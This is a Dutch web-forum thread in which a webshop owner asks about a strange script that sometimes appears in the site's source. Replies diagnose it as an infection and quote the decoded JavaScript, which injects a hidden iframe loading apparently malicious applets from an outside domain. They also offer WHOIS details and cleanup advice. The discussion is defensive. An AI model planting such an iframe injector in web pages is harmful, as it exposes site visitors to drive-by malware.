Hack of iets anders?

Status
Niet open voor verdere reacties.
S

SlimShady070

Nieuwe gebruiker
Lid geworden
9 dec 2011
Berichten
4
Goedemorgen, er is in een webshop een raar script gevonden, dit staat in de broncode, het is maar af en toe zichtbaar. Wat kan ik hier tegen doen en wat is het?


Alvast bedankt!

[Mod edit]De "script" code hier verwijderd ivm meldingen virusscanner. Deze is als bijlage terug te vinden in bericht nummer 13.[/Mod edit]
 
Laatst bewerkt door een moderator:
Website is inderdaad besmet. Wat er gebeurt is dat de functie de code die achteraan het bestand staat vertaald in een werkend stuk software. Dit is de kwaadaardige code.

Volgens mij zit deze code alleen in de index.php /index.html bestanden en niet in andere. De enige manier is om al die bestanden handmatig na te lopen en deze 2 stukjes code er uit te knippen.

De meest waarschijnlijke bron van besmetting is dat een pc waarmee de website wordt bewerkt is besmet.
 
Ik heb de bestanden al nagelopen en nergens kan ik deze vinden, ook de includes heb ik nagekeken en ook niks gevonden.

Het rare is ook dat er sinds 22 november geen wijzigingen zijn gemaakt, die bestanden heb ik ook nagekeken en niks raars gevonden.

Dus ik weet nu niet echt meer wat ik daarvoor moet doen
 
Ergens zal je toch iets over het hoofd gezien hebben. Dit is in elk geval de waarde van zx:

[cpp]
if (document.getElementsBҺTagName('body')[0]){ iframer(); } else { document.wite("<iframe src='http://broken-lemond.aelita.fr/showthread.php?t=63942072' width='10' height='10' style='visibility:hidden;position:absolute;left:0;to:0;'></iframe>"); } function iframr(){ var f = document.createElement('iframe');f.setAttribute('src','http://broken-lemond.aelita.fr/showthreadphp?t=63942072');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribut('height','10'); document.getElementsByTagName('body')[0].appendChild(f); }
[/cpp]

Nu heb ik maar beperkt kennis van javascript, maar het lijkt me dat e(zx) (event?) de bovenstaande code uitvoert op de computers van je klanten.
 
Laatst bewerkt door een moderator:
Wat doet het ??
Ik vroeg me af of je reclame ect hebt op je site.
Het staat toch mogelijk in head als het overal voorkomt, kan je eens een beetje html structuur laten zien waar het ergens staat.
Kan het content zijn die men invoerde één of ander mannier.

wat gebeurt er als je met firebug kijkt en dit staat onderaan je pagina moet er iets in de fout gaan toch.
<script>

aa=null;
</script>
 
Wat doet het ??
Klik om te vergroten...

Het voegt de pagina "http://broken-lemond.aelita.fr/showthread.php?t=6342072" toe aan de opgevraagde pagina door het te embedden als iframe. De pagina waarnaar gelinkt wordt bevat enkele java applets met (hoogstwaarschijnlijk) kwaadaardige code. Heb verder niet de moeite genomen om de applets te decompilen. Wel kwam ik er door het gebruik van een Linux VM meteen achter dat de pagina een ingebouwde beveiliging heeft, het controleert namelijk aan de hand van de user-agent of het OS/browser kwetsbaar is. En de ironie wil dat je dit ook meteen als workaround kan gebruiken om de hack te breken. Door het toevoegen van een script welke als eerste wordt uitgevoerd die de user-agent instelt op een user-agent die de site niet lust, zal er dus nooit de kwaadaardige code uitgevoerd worden. Via Google kom ik o.a. op de volgende oplossing om de user-agent in een script te wijzigen:

[cpp]
var __originalNavigator = navigator;
navigator = new Object();
navigator.__proto__ = __originalNavigator;
navigator.__defineGetter__('userAgent', function () { return 'Custom'; });
[/cpp]

bron: http://stackoverflow.com/questions/1307013/mocking-a-useragent-in-javascript

De gebruiker zou nu geen last meer moeten hebben van de malware/spyware. Dat neemt uiteraard niet weg dat je nog steeds de bron van al het kwaad moet uitzoeken.
 
Als toevoeging: de beveiliging geeft bij een user-agent die niet kwetsbaar is een lege pagina terug. Daarom zal de kwaadaardige code dus ook nooit uitgevoerd worden.
 
Workaround is leuk, maar je kunt ook met notepad++ in je bestanden naar deze code zoeken en verwijderen uit je scripts. Dat voorkomt meteen dat je site geblocked gaat worden door allerlei filters van google e.d.

Wat ik in het verleden heb gevonden is dat besmetting het meest komt uit de hoek van de pc waarmee de website word bijgehouden. Of men heeft een heel zwak ftp wachtwoord.
 
Dus dit is de link http://broken-lemond.aelita.fr/showthread.php?t=6342072
voor mensen die (goback deluxe)(nu onder naam rolback deluxe) kennen na bevestiging zal ik trachten in kaart te brengen wat er gebeurt.Mijn vraag aan u is wil u bewijs?

server eigenaar
domain: aelita.fr
status: ACTIVE
hold: NO
holder-c: ANO00-FRNIC
admin-c: ANO00-FRNIC
tech-c: OVH5-FRNIC
zone-c: NFC1-FRNIC
nsl-id: NSL22808-FRNIC
registrar: OVH
anniversary: 29/10
created: 29/10/2007
last-update: 30/10/2009
source: FRNIC

ns-list: NSL22808-FRNIC
nserver: 87-98-140-145.ovh.net
nserver: ns.kimsufi.com
source: FRNIC

registrar: OVH
type: Isp Option 1
address: 2 Rue Kellermann
address: BP 80157
address: ROUBAIX CEDEX 1
country: FR
phone: +33 8 99 70 17 61
fax-no: +33 3 20 83 99 28
e-mail:
website: http://www.ovh.fr
anonymous: NO
registered: 21/10/1999
source: FRNIC

nic-hdl: ANO00-FRNIC
type: PERSON
contact: Ano Nymous
remarks: -------------- WARNING --------------
remarks: While the registrar knows him/her,
remarks: this person chose to restrict access
remarks: to his/her personal data. So PLEASE,
remarks: don't send emails to Ano Nymous. This
remarks: address is bogus and there is no hope
remarks: of a reply.
remarks: -------------- WARNING --------------
changed: 09/02/2011
anonymous: YES
obsoleted: NO
eligstatus: ok
eligdate: 29/10/2007 00:00:00
source: FRNIC

nic-hdl: OVH5-FRNIC
type: ROLE
contact: OVH NET
address: OVH
address: 140, quai du Sartel
address: 59100 Roubaix
country: FR
phone: +33 8 99 70 17 61
e-mail:
trouble: Information: http://www.ovh.fr
trouble: Questions: mailto:
trouble: Spam: mailto:
admin-c: OK217-FRNIC
tech-c: OK217-FRNIC
notify:
changed: 11/10/2006
anonymous: NO
obsoleted: NO
source: FRNIC
 
RogerS zei:
Workaround is leuk, maar je kunt ook met notepad++ in je bestanden naar deze code zoeken en verwijderen uit je scripts. Dat voorkomt meteen dat je site geblocked gaat worden door allerlei filters van google e.d.
Klik om te vergroten...

Dat heeft de TS al geprobeerd en hij heeft zelf niks kunnen vinden. Overigens lijkt het mij het eenvoudigste om gewoon een back-up van de database te maken en dan alle bestanden opnieuw plaatsen (neem aan dat die beschikbaar zijn).
 
En hoe komt TS dan aan deze code. Deze heeft hij toch vast ergens op z'n site aangetroffen.
 
Je kan zelf toch lezen wat hij geschreven heeft, of niet? Ja, de code wordt inderdaad geinjecteerd op zijn site, maar niet altijd. En in de source heeft hij zelf niet de oorzaak kunnen vinden.
 
Laatst bewerkt door een moderator:
Ik heb het eerste bericht aangepast en daar de "Script" code uit verwijderd. NOD32 gaf hier meldingen over, hebben we van diverse personen begrepen.

De tekst zit in de bijlage van mijn bericht.
 

Bijlagen

nu heb ik de code leesbaarder gemaakt zijn er die werking kunnen uitleggen.
 
Laatst bewerkt door een moderator:
Code wordt weer geplaatst en NOD32 begint alweer te schreeuwen.:(

Bericht boven mij aangepast en de gehele HTML Code inclusief codetag in een tekst bestand gezet.
 

Bijlagen

Kopieer je hele website naar je machine en vergelijk die met een 100% zeker schone bron die je vast ook nog wel als backup hebt staan met een tool als "beyond compare" (vergelijk dan ook inhoudelijk) dan kom je snel genoeg achter de foute bestanden.

Daarna moet je gaan zoeken naar de methode van injectie (invoer boxen die niet beveiligd zijn, advertentie ruimtes etc etc etc)
 
Status
Niet open voor verdere reacties.
                    Steun ons                    

Nieuwste berichten

Terug
Bovenaan Onderaan